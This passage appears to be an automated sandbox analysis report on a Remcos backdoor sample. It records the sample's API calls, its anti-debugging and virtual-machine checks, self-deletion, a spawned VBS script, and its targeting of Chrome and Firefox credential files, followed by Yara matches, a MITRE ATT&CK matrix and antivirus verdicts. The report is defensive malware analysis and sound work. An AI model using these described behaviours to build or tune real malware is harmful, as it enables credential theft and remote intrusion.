                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00434006 push ecx; ret 0_2_00434019
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004567F0 push eax; ret 0_2_0045680E
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00455EBF push ecx; ret 0_2_00455ED2
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00406128 ShellExecuteW,URLDownloadToFileW,0_2_00406128
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BD4

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\wscript.exe | File deleted: c:\users\user\desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_0041BCF3
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0040E54F Sleep,ExitProcess, 0_2_0040E54F
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 0_2_004198D2
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Window / User API: threadDelayed 699
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Window / User API: threadDelayed 8769
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Window / User API: foregroundWindowGot 1768
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7808 | Thread sleep count: 251 > 30
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7808 | Thread sleep time: -125500s >= -30000s
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812 | Thread sleep count: 699 > 30
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812 | Thread sleep time: -2097000s >= -30000s
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812 | Thread sleep count: 8769 > 30
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe TID: 7812 | Thread sleep time: -26307000s >= -30000s
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_0040B335
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 0_2_0041B43F
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_0040B53A
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0044D5F9 FindFirstFileExA, 0_2_0044D5F9
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 0_2_004089A9
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00406AC2 FindFirstFileW,FindNextFileW, 0_2_00406AC2
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 0_2_00407A8C
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_00418C79
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 0_2_00408DA7
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_00406F06
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000083E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: S}od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000083E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW/S]
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.000000000083E000.00000004.00000020.00020000.00000000.sdmp, 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000083E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(1
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | API call chain: ExitProcess graph end node graph_0-48060
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043A66D
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_0041BCF3
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00442564 mov eax, dword ptr fs:[00000030h] 0_2_00442564
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0044E93E GetProcessHeap, 0_2_0044E93E
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00434178
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043A66D
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00433B54
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00433CE7 SetUnhandledExceptionFilter, 0_2_00433CE7
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_00410F36
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00418764 mouse_event, 0_2_00418764
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, logs.dat.0.dr | Binary or memory string: [Program Manager]
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00433E1A cpuid 0_2_00433E1A
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetLocaleInfoA, 0_2_0040E679
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetLocaleInfoW, 0_2_004510CA
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: EnumSystemLocalesW, 0_2_004470BE
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_004511F3
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetLocaleInfoW, 0_2_004512FA
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_004513C7
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetLocaleInfoW, 0_2_004475A7
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_00450A8F
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: EnumSystemLocalesW, 0_2_00450D52
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: EnumSystemLocalesW, 0_2_00450D07
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: EnumSystemLocalesW, 0_2_00450DED
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00450E7A
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00404915 GetLocalTime,CreateEventA,CreateThread, 0_2_00404915
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041A7B2 GetComputerNameExW,GetUserNameW, 0_2_0041A7B2
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_0044801F
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_0040B21B
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_0040B335
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: \key3.db 0_2_0040B335

Remote Access Functionality

Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-IUHLZ9
Source: Yara match | File source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: cmd.exe 0_2_00405042
MITRE ATT&CK matrix (columns are tactics; a technique that the report's signatures flagged carries the report's superscript count in parentheses, all other cells are the matrix's default entries):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (11) | Valid Accounts | Native API (1) | Scripting (11) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (12) | DLL Side-Loading (1) | Bypass User Account Control (1) | Obfuscated Files or Information (2) | Input Capture (211) | Account Discovery (1) | Remote Desktop Protocol | Input Capture (211) | Encrypted Channel (2) | Exfiltration Over Bluetooth | Defacement (1)
Email Addresses | DNS Server | Domain Accounts | Service Execution (2) | Windows Service (1) | Access Token Manipulation (1) | DLL Side-Loading (1) | Credentials In Files (2) | System Service Discovery (1) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Windows Service (1) | Bypass User Account Control (1) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Remote Access Software (1) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (22) | File Deletion (1) | LSA Secrets | System Information Discovery (23) | SSH | Keylogging | Non-Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (1) | Cached Domain Credentials | Security Software Discovery (21) | VNC | GUI Input Capture | Application Layer Protocol (12) | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (1) | DCSync | Virtualization/Sandbox Evasion (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (1) | Proc Filesystem | Process Discovery (2) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (22) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Owner/User Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

Source | Detection | Scanner | Label | Link
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos |
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | 100% | Avira | BDS/Backdoor.Gen |
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
